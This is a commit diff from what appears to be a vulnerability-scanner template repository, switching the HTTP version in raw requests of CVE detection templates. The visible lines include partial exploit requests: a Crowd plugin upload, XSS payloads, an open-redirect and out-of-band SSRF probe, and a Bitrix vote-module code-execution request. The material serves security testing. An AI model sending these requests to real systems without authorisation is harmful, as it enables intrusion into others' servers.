Skip to content

Commit f6e4e30

Browse files
committed
Updated HTTP/2 to HTTP/1.1
1 parent 5b4f5ca commit f6e4e30

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

54 files changed

+77
-77
lines changed

http/cves/2019/CVE-2019-11580.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -36,7 +36,7 @@ variables:
3636
http:
3737
- raw:
3838
- |
39-
POST /crowd/admin/uploadplugin.action HTTP/2
39+
POST /crowd/admin/uploadplugin.action HTTP/1.1
4040
Host: {{Hostname}}
4141
Accept-Encoding: gzip, deflate
4242
Content-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7
@@ -49,7 +49,7 @@ http:
4949
{{plugin}}
5050
------------------------------f15fe87e95a7--
5151
- |
52-
GET /crowd/plugins/servlet/exp HTTP/2
52+
GET /crowd/plugins/servlet/exp HTTP/1.1
5353
Host: {{Hostname}}
5454
5555
matchers:

http/cves/2020/CVE-2020-18268.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,7 @@ http:
3939
4040
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
4141
- |
42-
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
42+
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/1.1
4343
Host: {{Hostname}}
4444
4545
matchers:

http/cves/2021/CVE-2021-24647.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -41,7 +41,7 @@ http:
4141
4242
log={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1
4343
- |
44-
GET /wp-admin/profile.php HTTP/2
44+
GET /wp-admin/profile.php HTTP/1.1
4545
Host: {{Hostname}}
4646
Content-Type: application/x-www-form-urlencoded
4747

http/cves/2022/CVE-2022-0954.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -46,14 +46,14 @@ http:
4646
4747
username={{username}}&password={{password}}
4848
- |
49-
POST /api/save_option HTTP/2
49+
POST /api/save_option HTTP/1.1
5050
Host: {{Hostname}}
5151
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
5252
Referer: {{BaseURL}}/admin/view:shop/action:options
5353
5454
option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother
5555
- |
56-
POST /module/ HTTP/2
56+
POST /module/ HTTP/1.1
5757
Host: {{Hostname}}
5858
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
5959
Referer: {{BaseURL}}/admin/view:shop/action:options

http/cves/2022/CVE-2022-1815.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -37,7 +37,7 @@ info:
3737
http:
3838
- raw:
3939
- |
40-
GET /service/0/test.oast.me HTTP/2
40+
GET /service/0/test.oast.me HTTP/1.1
4141
Host: {{Hostname}}
4242
4343
matchers:

http/cves/2022/CVE-2022-24086.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -113,7 +113,7 @@ http:
113113

114114
- raw:
115115
- |
116-
POST /rest/default/V1/guest-carts/{{entity_id}}/shipping-information HTTP/2
116+
POST /rest/default/V1/guest-carts/{{entity_id}}/shipping-information HTTP/1.1
117117
Host: {{Hostname}}
118118
Content-Type: application/json
119119
@@ -130,7 +130,7 @@ http:
130130

131131
- raw:
132132
- |
133-
POST /rest/default/V1/guest-carts/{{entity_id}}/payment-information HTTP/2
133+
POST /rest/default/V1/guest-carts/{{entity_id}}/payment-information HTTP/1.1
134134
Host: {{Hostname}}
135135
Content-Type: application/json
136136

http/cves/2022/CVE-2022-24181.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -35,7 +35,7 @@ info:
3535
http:
3636
- raw:
3737
- |
38-
GET /iupjournals/index.php/esj HTTP/2
38+
GET /iupjournals/index.php/esj HTTP/1.1
3939
Host: {{Hostname}}
4040
X-Forwarded-Host: foo"><script>alert(document.domain)</script><x=".com
4141

http/cves/2022/CVE-2022-27228.yaml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -36,7 +36,7 @@ flow: http(1) && http(2)
3636
http:
3737
- raw:
3838
- |
39-
GET /bitrix/admin/ HTTP/2
39+
GET /bitrix/admin/ HTTP/1.1
4040
Host: {{Hostname}}
4141
4242
matchers:
@@ -55,7 +55,7 @@ http:
5555

5656
- raw:
5757
- |
58-
POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/2
58+
POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.1
5959
Host: {{Hostname}}
6060
Content-Type: multipart/form-data; boundary=---------------------------xxxxxxxxxxxx
6161

http/cves/2022/CVE-2022-28290.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -39,7 +39,7 @@ http:
3939
4040
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
4141
- |
42-
POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2
42+
POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/1.1
4343
Host: {{Hostname}}
4444
Content-Type: application/x-www-form-urlencoded
4545

http/cves/2022/CVE-2022-34267.yaml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -29,7 +29,7 @@ info:
2929
http:
3030
- raw:
3131
- |
32-
GET /ws-api/v2/users/me/details?token=02 HTTP/2
32+
GET /ws-api/v2/users/me/details?token=02 HTTP/1.1
3333
Host: {{Hostname}}
3434
3535
matchers-condition: and

0 commit comments

Comments
 (0)